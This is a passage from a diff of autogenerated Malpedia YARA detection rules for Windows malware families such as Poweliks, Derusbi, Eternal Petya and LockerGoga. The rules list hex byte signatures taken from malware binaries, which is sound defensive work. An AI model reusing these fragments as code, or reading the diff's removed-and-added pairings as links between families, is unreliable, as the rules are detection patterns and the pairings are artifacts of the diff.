e8???????? 84c0 } - $sequence_3 = { ff15???????? 85c0 7511 e8???????? 84c0 7508 83c8ff } - $sequence_4 = { 7511 e8???????? 84c0 7508 83c8ff e9???????? } - $sequence_5 = { ff15???????? 85c0 7511 e8???????? 84c0 7508 } - $sequence_6 = { 7511 e8???????? 84c0 7508 83c8ff } - $sequence_7 = { ff15???????? 85c0 7511 e8???????? 84c0 } - $sequence_8 = { 85c0 7511 e8???????? 84c0 7508 83c8ff } - $sequence_9 = { 4133c0 23c1 33c2 4103c1 } + $sequence_0 = { 85c9 741f 33c0 85c9 } + $sequence_1 = { e8???????? 85c0 b91d000000 0f44d9 } + $sequence_2 = { 8906 83f824 723e b824000000 } + $sequence_3 = { 8b4dfc 51 8b55f8 52 e8???????? 83c408 8945f4 } + $sequence_4 = { 33d2 b904000000 e8???????? 33c0 83f801 7425 baffffffff } + $sequence_5 = { 83793000 0f85be000000 8b55fc 8b45f0 } + $sequence_6 = { 837c245000 7402 eb12 c744245401000000 33c0 } + $sequence_7 = { c705????????07000000 8b442438 8905???????? c705????????00000000 8b442440 8905???????? c705????????b80b0000 } + $sequence_8 = { 837c242001 7425 837c242002 7441 837c242003 745d 837c242004 } + $sequence_9 = { 85c0 752b 8d45f8 c745f882000000 50 8d8618010000 50 } + $sequence_10 = { 66837c246c2e 7518 0fb74c246e 6685c9 } + $sequence_11 = { 83790800 745d c745f800000000 eb09 8b55f8 83c201 } + $sequence_12 = { 746b c744242000000000 eb0a 8b442420 } + $sequence_13 = { 6a04 e8???????? 83c40c 8b4d0c 51 } + $sequence_14 = { 8b442448 89442420 837c242001 7402 eb05 e8???????? } + $sequence_15 = { 8b45f0 83781000 750e 8b4df0 8b510c 0355cc 8955e4 } + $sequence_16 = { 0fb74c247e 6685c9 0f84cd010000 6683f92e 750f } + $sequence_17 = { 720b 03f0 eb9c 5f 5e 33c0 5b } + $sequence_18 = { e8???????? b90e000000 ff15???????? 33c0 e9???????? e9???????? ff15???????? } + $sequence_19 = { 745d 837c242004 7479 837c242005 0f8480000000 } + $sequence_20 = { ebbc 8b4dfc 8b5108 52 ff15???????? 83c404 8b45fc } + $sequence_21 = { 8d8574fdffff 6804010000 50 6a00 ff15???????? 8d8574fdffff } + $sequence_22 = { 7426 8b4f04 85c9 741f } + $sequence_23 = { 8139aaeeddff 0f858e000000 8b4104 85c0 } + $sequence_24 = { 8b45fc 8b08 83792800 7457 } + $sequence_25 = { 85c9 7513 ffb318020000 ff15???????? 33c0 5b } + $sequence_26 = { 8b45ac 894610 8b45b0 894614 ff15???????? 66894604 8d45e8 } + $sequence_27 = { 8b55fc 8b4230 50 ff15???????? 83c404 } + $sequence_28 = { ba08020000 0f114014 c7400856120000 89580c c700aaeeddff } + $sequence_29 = { 85c0 7416 0f1f4000 8bc1 83e00f 8a0430 30441124 } condition: - 7 of them and filesize <950272 + 7 of them and filesize <417792 } -rule MALPEDIA_Win_Poweliks_Auto : FILE +rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "14491e8d-2d96-5692-9946-38a18e40eb85" + id = "0c2a0c7f-3a72-55a1-acff-1cca63da0ecc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poweliks_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dinodas_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dinodas_rat_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "38ca9b6ecbf4df7389b1ea24aaf1d7d4d015a732f44c61342f6c9c25d4c2ea48" + logic_hash = "146f67c88b1bd9a83aac7a1be7e8f308bd7d506106d4fba538a0dc2d1ddf0d08" score = 75 quality = 75 tags = "FILE" @@ -145611,32 +148373,32 @@ rule MALPEDIA_Win_Poweliks_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb0b 8b5118 ebc9 8b5dec 8b75e8 8b45f8 8b0c87 } - $sequence_1 = { c745b4726f6341 c745b864647265 66c745bc7373 c645be00 8bc8 57 } - $sequence_2 = { 83ff0c 7439 3bc8 75ce 8b5508 } - $sequence_3 = { 8d5598 33ff 2bf2 8d147e 8a541598 32547d98 } - $sequence_4 = { 7415 8b7d08 8b720c 81c704110000 03f7 8b7a04 } - $sequence_5 = { 663b4b06 7333 8b4a08 8b32 3bce 7602 8bce } - $sequence_6 = { 33c9 663b4b06 7333 8b4a08 8b32 3bce 7602 } - $sequence_7 = { 57 0fb65dfe 81e307000080 7905 4b } - $sequence_8 = { 8b3486 8365fc00 03ca 894df4 8d45d0 03f2 2945f4 } - $sequence_9 = { 3a5c0db0 7506 40 83f80f } + $sequence_0 = { 85c9 743b 8b10 8b04b2 8b400c 85c0 7409 } + $sequence_1 = { 6a18 c705????????acff4300 c705????????00000000 e8???????? 83c404 85c0 } + $sequence_2 = { 50 51 ffd3 83bdb85fffff00 75af 837e2c00 } + $sequence_3 = { 833c0e00 755b 8b5dd4 8b4304 80781500 8bd3 7522 } + $sequence_4 = { df6df8 df6de0 def9 dc0d???????? dd45d8 d8d9 dfe0 } + $sequence_5 = { 83bdd4c3ffff10 7306 8d85c0c3ffff 56 50 57 e8???????? } + $sequence_6 = { 8344241408 894c2420 83e908 89542434 8b542430 33db 8bf7 } + $sequence_7 = { 8b55d0 8b45cc 8b4dec 2bd0 41 c1fa02 894dec } + $sequence_8 = { e8???????? 8b8d6cffffff 8bb568ffffff 2bce b893244992 f7e9 03d1 } + $sequence_9 = { 7546 8b15???????? 6aff 52 ffd7 8d5d08 8d45f8 } condition: - 7 of them and filesize <115712 + 7 of them and filesize <638976 } -rule MALPEDIA_Win_Derusbi_Auto : FILE +rule MALPEDIA_Win_Babar_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7e17bc22-c095-50d8-a4c2-1bf339697e7b" + id = "907c27e3-2fb8-508f-9c67-d8826ced6045" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.derusbi_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.babar_auto.yar#L1-L166" license_url = "N/A" - logic_hash = "325459f5183ff3b300e1f181ae53b4a2cb1c12e04a563b27e6a394d452c11ac4" + logic_hash = "8e0331df8b3130917de8e5e3d5d2fa36fbe1f95285a5ec05160d56f936d6e114" score = 75 quality = 75 tags = "FILE" @@ -145650,34 +148412,40 @@ rule MALPEDIA_Win_Derusbi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b819c000000 8d4de8 51 8d4dec 51 ffb00c010000 c745e810000000 } - $sequence_1 = { 8d55ec e8???????? 8d4f08 56 8d55f3 e8???????? 59 } - $sequence_2 = { 8913 ff15???????? 83c40c e8???????? b301 57 ff15???????? } - $sequence_3 = { 33c5 8945f8 8b4508 66833800 53 56 57 } - $sequence_4 = { 8945f8 8b4508 56 57 50 8d8de4fbffff 899590f9ffff } - $sequence_5 = { 64a300000000 8b5d0c 8b4508 894c2414 89442418 85db 0f8457050000 } - $sequence_6 = { 50 ffd6 b903010000 2bc8 51 8d85ecfdffff 68???????? } - $sequence_7 = { 56 56 56 6a03 56 68???????? 6800040000 } - $sequence_8 = { ffd3 50 57 ffb5f8fbffff ff15???????? 83c410 85c0 } - $sequence_9 = { ffb5d4fdffff 898db8fdffff ffb5ecfdffff ffb5f0fdffff ff15???????? 3bc7 } + $sequence_0 = { 3bd6 0f86f9feffff 8b54243c 8b442438 } + $sequence_1 = { 3bd6 0f8c7affffff 8bbc24d0000000 ddd9 } + $sequence_2 = { 3bd5 7e47 8d0c9500000000 2bd9 } + $sequence_3 = { 3bd5 0f8671ffffff 8144241890020000 ddd8 816c242880020000 83c710 81c680020000 } + $sequence_4 = { 46 8d44af08 8d5708 8d4cb500 d942f8 } + $sequence_5 = { 3bd6 0f82eefeffff 8b742458 03f5 } + $sequence_6 = { 3bd6 721b 57 8bcb } + $sequence_7 = { 3bd6 72d9 33f6 eb08 } + $sequence_8 = { 8906 0f8496000000 50 ffd7 894604 8b0d???????? 894e08 } + $sequence_9 = { 8d8407d8988069 c1c007 8bfa 03c6 33fe } + $sequence_10 = { 803800 8b0d???????? 741d 803900 7506 8b0d???????? 8a11 } + $sequence_11 = { 23d1 33d0 0354244c 8d94322108b449 c1ca0a 03d1 8bf1 } + $sequence_12 = { 57 8d3c85a09e0110 8b07 03c3 8a4824 } + $sequence_13 = { e8???????? 57 e8???????? 83c410 8d842480000000 50 ffd5 } + $sequence_14 = { 0fb64e04 884804 8b5604 c1ea08 885005 0fb64e06 } + $sequence_15 = { 8b4b04 55 8b2d???????? 68???????? } condition: - 7 of them and filesize <360448 + 7 of them and filesize <1294336 } -rule MALPEDIA_Win_Strongpity_Auto : FILE +rule MALPEDIA_Win_Ncctrojan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "74f27818-19f0-5cf0-92fb-64e00785ec08" + id = "964a63a1-2a33-5eff-ac10-defb358349c1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.strongpity_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ncctrojan_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "61a3d3556929a6d92379ea8e74c4d3e507b020fc18a8d58904a2026c1434bfed" - score = 60 - quality = 45 + logic_hash = "ca1178d41ac898e0a6dcd72371fc848e91a6cf3f5857a4b6b78db9de7f47f454" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -145689,38 +148457,38 @@ rule MALPEDIA_Win_Strongpity_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 33c0 d1f9 50 51 53 } - $sequence_1 = { 75f8 ff75d0 68???????? ff36 e8???????? } - $sequence_2 = { 41 83ea01 75f7 50 e8???????? 59 } - $sequence_3 = { e8???????? 8b4608 83c418 6a2f 59 } - $sequence_4 = { 8945f8 f7d8 56 57 } - $sequence_5 = { 33db c745f804000000 53 ff7710 895df4 ff770c } - $sequence_6 = { ba???????? f3a5 8bf2 668b02 83c202 } - $sequence_7 = { 83e801 7408 6a02 58 884612 } - $sequence_8 = { 0107 83be8800000002 8b07 0f85ad000000 83f814 } - $sequence_9 = { 012e 885c240a e9???????? 84db 0f8434020000 } - $sequence_10 = { 5f 8d4503 5d 5b 8b4c2428 } - $sequence_11 = { 7417 48 7545 39812c020000 7433 8b8124020000 } - $sequence_12 = { 5f 8b4c2408 5e 5b } - $sequence_13 = { 5f 8d4502 5d 5e 5b 8b4c2468 } - $sequence_14 = { 012e 885c240a ebc3 80fb5d 7520 837c240c00 0f85fe020000 } - $sequence_15 = { 5f 8bc3 5b c3 8d4638 50 e8???????? } + $sequence_0 = { 7536 8b85e8feffff 85c0 750a 68???????? } + $sequence_1 = { 68???????? e9???????? 83f801 750a } + $sequence_2 = { 83f801 750a 68???????? e9???????? 83f802 } + $sequence_3 = { 68e9fd0000 ffd6 8d8decfdffff 5f 8d5102 5e 668b01 } + $sequence_4 = { 8b442420 83c40c 83c008 836c240c01 89442414 0f85fffdffff } + $sequence_5 = { 8d4a10 0f1f840000000000 0f1041f0 83c020 } + $sequence_6 = { ffd6 50 8d85dcfdffff 50 } + $sequence_7 = { e8???????? 83c40c 85c0 752f 6a06 8d85c4bfffff } + $sequence_8 = { 51 f2c3 8b4df0 33cd f2e8bef6ffff } + $sequence_9 = { 83c414 e8???????? 84c0 7517 } + $sequence_10 = { 33c5 8945fc 56 6890010000 } + $sequence_11 = { 83faff 0f94c0 84c0 7405 } + $sequence_12 = { 83c418 83c008 03c6 8bcf } + $sequence_13 = { 0fb601 50 8d45d0 68???????? 50 } + $sequence_14 = { 83ec14 c645fc1f 8d95e8feffff 8bcc } + $sequence_15 = { 668bc1 8be5 5d c3 56 8bf1 } condition: - 7 of them and filesize <999424 + 7 of them and filesize <1160192 } -rule MALPEDIA_Win_Hermes_Auto : FILE +rule MALPEDIA_Win_Aurora_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "61ab2fc1-04d0-5933-ac64-b12602279b7d" + id = "6739f143-45de-5c25-aa97-f9c0ab868c7e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hermes_auto.yar#L1-L111" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aurora_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "9cfed48151b17cbf55d1481eb34069ea472830263b97aa44ce683b55da6f12b5" + logic_hash = "401b46f1e5d6c2d35e6c7ba88f463abdb92c79f1d47fd14fd19c66427ffd50ad" score = 75 quality = 75 tags = "FILE" @@ -145734,32 +148502,32 @@ rule MALPEDIA_Win_Hermes_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a01 6810660000 ff75fc ff15???????? } - $sequence_1 = { ff15???????? 33d2 6a79 59 f7f1 83c261 } - $sequence_2 = { 6a01 ff15???????? 8d45fc 50 } - $sequence_3 = { 8b4508 83c801 50 6a01 ff75fc } - $sequence_4 = { 8b4508 83c801 50 6a01 ff75fc ff15???????? } - $sequence_5 = { 50 8b4508 83c801 50 } - $sequence_6 = { 6a04 6800100000 6888130000 6a00 } - $sequence_7 = { 50 6a01 6810660000 ff75fc ff15???????? } - $sequence_8 = { 6800100000 6888130000 6a00 ff15???????? } - $sequence_9 = { 50 8d45fc 50 ff15???????? 6a20 } + $sequence_0 = { 8b4e14 8945d4 8b4610 3bc1 7530 40 83f8fe } + $sequence_1 = { c645fc03 8d4dd8 837dec08 8d5dd8 } + $sequence_2 = { 8aca c0e206 0255d3 c0e902 80e10f } + $sequence_3 = { ebd9 837b1410 7202 8b1b } + $sequence_4 = { 3bf3 7469 897de8 c645fc01 85ff 7437 c7471000000000 } + $sequence_5 = { 6a00 c741140f000000 c7411000000000 68???????? c60100 e8???????? 8d8df8fbffff } + $sequence_6 = { 83793800 0f45c2 50 e8???????? 8b9df0feffff c745e40f000000 c745e000000000 } + $sequence_7 = { c785c8f1ffff0f000000 c785c4f1ffff00000000 c685b4f1ffff00 e8???????? 8d8dccf1ffff } + $sequence_8 = { 68???????? 8d8d24f1ffff c78538f1ffff0f000000 c78534f1ffff00000000 } + $sequence_9 = { 6a02 68???????? 8d8d14efffff c78528efffff0f000000 } condition: - 7 of them and filesize <7192576 + 7 of them and filesize <827392 } -rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE +rule MALPEDIA_Win_Revenant_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3a77c0fc-cd49-5986-b2b4-8a8639992c93" + id = "a1374c5f-49ed-5419-afea-48c7289282d4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.neutrino_pos_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.revenant_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "d3da7317997b76876b14e53b428d397cde821604c2c6da81c73b18c8b2dd677f" + logic_hash = "c5089ea5b4a1f250ceb154edb995f0fd96a084eb423c884f131dc135f20dbca0" score = 75 quality = 75 tags = "FILE" @@ -145773,32 +148541,32 @@ rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68fbd5fba3 43 53 897dfc e8???????? 83c40c 56 } - $sequence_1 = { 5a 6a71 6689955affffff 5a 6a61 6689955cffffff } - $sequence_2 = { 6863ad115b 6a04 c745e801000000 8945f4 e8???????? 59 } - $sequence_3 = { e8???????? 59 59 6a00 56 e9???????? } - $sequence_4 = { 6a62 66898556ffffff 58 6a53 66898558ffffff } - $sequence_5 = { 59 6a64 66898d6cffffff 59 6a68 66898d6effffff 59 } - $sequence_6 = { 6a63 6689854cffffff 58 6a62 6689854effffff 58 6a69 } - $sequence_7 = { 66895db2 6a64 8bd9 66895db4 8bd8 66895db6 5b } - $sequence_8 = { 8b45e0 8b08 6a03 50 ff5138 } - $sequence_9 = { 66894dd6 66894dd8 66894dda 66894ddc 66894dde 66894de0 66894de2 } + $sequence_0 = { 4c8d4c2458 4889f1 4889c3 31c0 4889442420 4889da ff15???????? } + $sequence_1 = { 4c89e1 e8???????? 488906 31c0 48894608 } + $sequence_2 = { ba28000000 b940000000 ffd6 31d2 } + $sequence_3 = { eb3a 4c89e1 e8???????? 488906 31c0 } + $sequence_4 = { 4889442450 e8???????? 85c0 4189c7 } + $sequence_5 = { 4c01c2 31c9 49f7d0 48ffc9 4939c8 740a 448a140a } + $sequence_6 = { 41b842000000 4c89e1 ff15???????? 8b4c246c 4989c4 } + $sequence_7 = { 8b00 41390424 7592 41c744240801000000 } + $sequence_8 = { 4883c328 4839fb 7427 41b808000000 4889f2 4889d9 } + $sequence_9 = { e8???????? ba04010000 b940000000 48c744242804010000 41ffd6 4885c0 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <99328 } -rule MALPEDIA_Win_Pirpi_Auto : FILE +rule MALPEDIA_Win_Eternal_Petya_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "98537945-bca9-5f78-aa80-688498d88ff3" + id = "bf49aeac-2e4f-5384-8db1-b43fb4139322" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pirpi_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.eternal_petya_auto.yar#L1-L162" license_url = "N/A" - logic_hash = "b10391fa85a6d93cb62abde2610054ffc017de9bf6b1bef0a98b13168e41c382" + logic_hash = "715ae6ddfaceb7ac967a454caeda07039960e25d99f3dc3f83571a182c2a56de" score = 75 quality = 75 tags = "FILE" @@ -145812,34 +148580,40 @@ rule MALPEDIA_Win_Pirpi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 33ff 8945f4 85c0 897dfc } - $sequence_1 = { 46 3bf7 72eb c6043b00 5d 8bc7 } - $sequence_2 = { 50 ff15???????? 83c414 8d8c2434010000 } - $sequence_3 = { 8bd8 83c408 85db 7515 68???????? 50 } - $sequence_4 = { 83c404 85ed 7513 53 ff15???????? 5f 5e } - $sequence_5 = { 56 ff15???????? 56 8be8 ff15???????? 33d2 3bea } - $sequence_6 = { 33c0 f2ae f7d1 49 83f920 7350 } - $sequence_7 = { 03d8 f3a4 c6042b00 eb6e } - $sequence_8 = { 55 c744242018000000 e8???????? 83f87a 753b 55 8b2d???????? } - $sequence_9 = { 89442414 7516 ff15???????? 894504 c744241000000000 e9???????? } + $sequence_0 = { 55 8bec 51 57 68000000f0 } + $sequence_1 = { 53 8d4644 50 53 } + $sequence_2 = { 57 68000000f0 6a18 33ff } + $sequence_3 = { 53 6a21 8d460c 50 } + $sequence_4 = { 68f0000000 6a40 ff15???????? 8bd8 } + $sequence_5 = { 49 75f2 8b4364 034360 8b4b68 894dd4 } + $sequence_6 = { 8945d0 8bc7 8b7df8 d3e8 8b4de0 03c1 8d3c87 } + $sequence_7 = { 55 8bec 8b4d0c baff000000 } + $sequence_8 = { 8d4508 50 53 ff750c 897508 } + $sequence_9 = { 68???????? e8???????? 85c0 7403 83ce02 } + $sequence_10 = { 68e8030000 ff15???????? 3bfe 75d3 } + $sequence_11 = { 55 8bec 8b5508 53 56 57 8b721c } + $sequence_12 = { 8b07 85c0 75c3 8b75f4 } + $sequence_13 = { e8???????? 894610 895614 8bc6 5f 5e } + $sequence_14 = { 898502fcffff 8b85e8fbffff 99 81e2ff010000 } + $sequence_15 = { 56 51 ffd3 8b15???????? 56 52 8985f0fbffff } condition: - 7 of them and filesize <327680 + 7 of them and filesize <851968 } -rule MALPEDIA_Win_Protonbot_Auto : FILE +rule MALPEDIA_Win_Redsalt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b19d2c4d-3d72-5fe6-aaaa-c0b323237a91" + id = "295994ac-254e-59ee-b227-ac14e9e1f055" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.protonbot_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redsalt_auto.yar#L1-L217" license_url = "N/A" - logic_hash = "9f42d2358a0490651f249ec756eecbb8cc6207cec8ace7f179285ca0a209261c" + logic_hash = "03f89ce4b045eb8ff5f60169a4045ddc5e403a310ae115cf10989b990183d50a" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -145851,32 +148625,47 @@ rule MALPEDIA_Win_Protonbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f434550 6a00 6a00 6a00 } - $sequence_1 = { 8b36 8d442408 50 56 e8???????? 83c408 83f808 } - $sequence_2 = { e8???????? 8d8dd4feffff e8???????? 83c418 c645fc01 } - $sequence_3 = { 899df8fffeff e8???????? 83c410 8bf8 } - $sequence_4 = { 8bf1 6a04 c745fc01000000 e8???????? 83c404 8bf8 } - $sequence_5 = { 837f1410 7202 8b3f 57 50 e8???????? ffb5d4feffff } - $sequence_6 = { 7f8d 5e 5f 33c0 5b 8b4dfc } - $sequence_7 = { 50 8d45f4 64a300000000 8bda 8bf9 8d8dd8feffff } - $sequence_8 = { 8d85b8fbffff 0f4385b8fbffff 50 8d85d0fbffff 68ff000000 50 e8???????? } - $sequence_9 = { b901000000 8bc2 c1e81e 33c2 69d06589076c 03d1 89948d54ecffff } + $sequence_0 = { 750b 68e8030000 ff15???????? e8???????? } + $sequence_1 = { 83c414 33c9 83f8ff 0f95c1 } + $sequence_2 = { e8???????? 85c0 750a 6a32 } + $sequence_3 = { c745d060ea0000 6a04 8d45d0 50 6806100000 } + $sequence_4 = { 51 ffd6 85c0 7510 } + $sequence_5 = { 85c0 7515 c705????????01000000 ff15???????? e9???????? } + $sequence_6 = { 83c9ff 85f6 7c0e 83fe7f 7f09 } + $sequence_7 = { 6a01 6a00 6a01 6800000080 } + $sequence_8 = { 7509 80780120 7503 83c002 } + $sequence_9 = { 8d8530fcffff 50 e8???????? 83c40c } + $sequence_10 = { 6a00 52 c744242401000000 8944242c c744243002000000 ff15???????? } + $sequence_11 = { c60100 5f 5e 33c0 } + $sequence_12 = { 83c40c eb02 33c0 8b4df4 } + $sequence_13 = { e8???????? 83c408 6800010000 68???????? } + $sequence_14 = { c1fa04 c0e302 0ad3 83c004 } + $sequence_15 = { 833800 750f c705????????01000000 e9???????? } + $sequence_16 = { eb03 83caff 8b442410 c0e106 } + $sequence_17 = { f7e7 8bea d1ed 33c0 83ef03 8a06 83c603 } + $sequence_18 = { c644243423 c644243572 c64424367a c644243700 } + $sequence_19 = { c8201cdd f7be5b408d58 1b7f01 d2cc } + $sequence_20 = { d2cc bbe3b46b7e 6aa2 dd45ff } + $sequence_21 = { e8???????? 85ed 4863cd 488be8 } + $sequence_22 = { e8???????? 8905???????? 48488b942498020000 488b8c2490020000 } + $sequence_23 = { e8???????? 8903 83f8ff 0f858e3e0b00 } + $sequence_24 = { e8???????? 8905???????? 4883c428 7502 } condition: - 7 of them and filesize <1073152 + 7 of them and filesize <2957312 } -rule MALPEDIA_Win_Unidentified_091_Auto : FILE +rule MALPEDIA_Win_Lockergoga_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8c2d9d9b-cb98-5dfc-90ce-01312105d94f" + id = "1c23217f-5659-545b-a560-32c15b901216" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_091" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_091_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lockergoga_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "5f25d4d54583311a39cbead5d516e9dd7eb57b96b31eb59a9b18d068eb7148c5" + logic_hash = "0b1cfe6b39387960d8fabaa4bf38642a4ddd7ce3aadb70d3ac9c167b96d0b767" score = 75 quality = 75 tags = "FILE" @@ -145890,32 +148679,32 @@ rule MALPEDIA_Win_Unidentified_091_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? c744244801000000 488d4c2460 48895c2440 4c8d8734030000 48894c2438 4c8d0ddf721400 } - $sequence_1 = { e8???????? 482be0 8b3a 488bd9 8b89d4050000 488bf2 85c9 } - $sequence_2 = { e9???????? 488d8ab00e0000 e9???????? 488d8ad00e0000 e9???????? 488d8af00e0000 e9???????? } - $sequence_3 = { 89742420 498b06 48634804 33d2 4a89543128 eb41 488b01 } - $sequence_4 = { eb6f 4c8b5048 4d85d2 7514 c74424207a020000 418d527c 41b884000000 } - $sequence_5 = { 742e c7814007000000000000 488d15b7081400 488b8938060000 41b895030000 e8???????? 48c7833806000000000000 } - $sequence_6 = { eb0f 488bd3 488d0dabf12500 e8???????? 488b85d0010000 48634804 488d0524fe2500 } - $sequence_7 = { e8???????? 90 488bcb e8???????? 85c0 7525 488b4c2438 } - $sequence_8 = { ffc3 e8???????? 3bd8 7cc6 41f6c708 0f85d0000000 4c8d058d0c1100 } - $sequence_9 = { eb03 890c90 8b4df3 48ffc2 4983c002 483bd1 72db } + $sequence_0 = { e9???????? 33c0 897dd4 8b560c 33c9 894514 3bc3 } + $sequence_1 = { 725e 8b06 8b7e38 8b80e4000000 89459c 3bd7 722c } + $sequence_2 = { e8???????? 50 ffb5f0feffff 8d85c0feffff c645fc0c 50 8bcf } + $sequence_3 = { ff10 8d4b10 e8???????? 6a38 53 e8???????? 83c408 } + $sequence_4 = { e8???????? 8d45d8 c645fc04 50 8bcb e8???????? 8b1b } + $sequence_5 = { e8???????? 8d45c0 c645fc01 50 8bce e8???????? 8bf0 } + $sequence_6 = { 8b4df0 33cd e8???????? 8be5 5d c3 ff7594 } + $sequence_7 = { 8b5904 8b7d0c 8975e8 8975ec 8945f0 c745fc00000000 85ff } + $sequence_8 = { f30f7e4710 660fd64610 c7471000000000 c747140f000000 c60700 83c718 c745fcffffffff } + $sequence_9 = { e8???????? 8bc8 3bcf 7413 837f1410 8bc7 7202 } condition: - 7 of them and filesize <5777408 + 7 of them and filesize <2588672 } -rule MALPEDIA_Win_Mewsei_Auto : FILE +rule MALPEDIA_Win_Forest_Tiger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "78bf6ca7-ef3d-53c3-89fb-bc5bc524aac5" + id = "2947155f-bcbc-5d27-b13d-2d3d872fe248" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mewsei_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.forest_tiger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.forest_tiger_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "3736165e5248449b2b75237b3807b31270781b320dfabe4092f7167612f74bb7" + logic_hash = "baf01183ad62d9cfadf21ee10ad4e3a50b3d3f1c1788ceb5d46999aa5751e1b0" score = 75 quality = 75 tags = "FILE" @@ -145929,32 +148718,32 @@ rule MALPEDIA_Win_Mewsei_Auto : FILE 